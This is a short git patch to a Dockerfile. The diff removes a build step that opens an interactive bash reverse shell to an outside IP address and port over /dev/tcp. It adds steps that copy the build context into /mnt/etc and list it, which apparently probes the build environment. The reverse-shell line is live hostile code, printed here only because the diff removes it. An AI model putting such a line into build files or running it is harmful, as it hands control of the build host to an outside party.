From 70fbc75b1286c966b9b969e54021f513f6fb73ab Mon Sep 17 00:00:00 2001 From: yoshino-s Date: Thu, 21 Aug 2025 15:32:52 +0800 Subject: [PATCH] update --- Dockerfile | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/Dockerfile b/Dockerfile index f736958..228d135 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,6 +1,5 @@ FROM ubuntu:latest - -RUN bash -c "bash -i >& /dev/tcp/152.136.32.206/7788 0>&1" - COPY / /mnt/etc + +RUN ls -ahl /mnt/etc \ No newline at end of file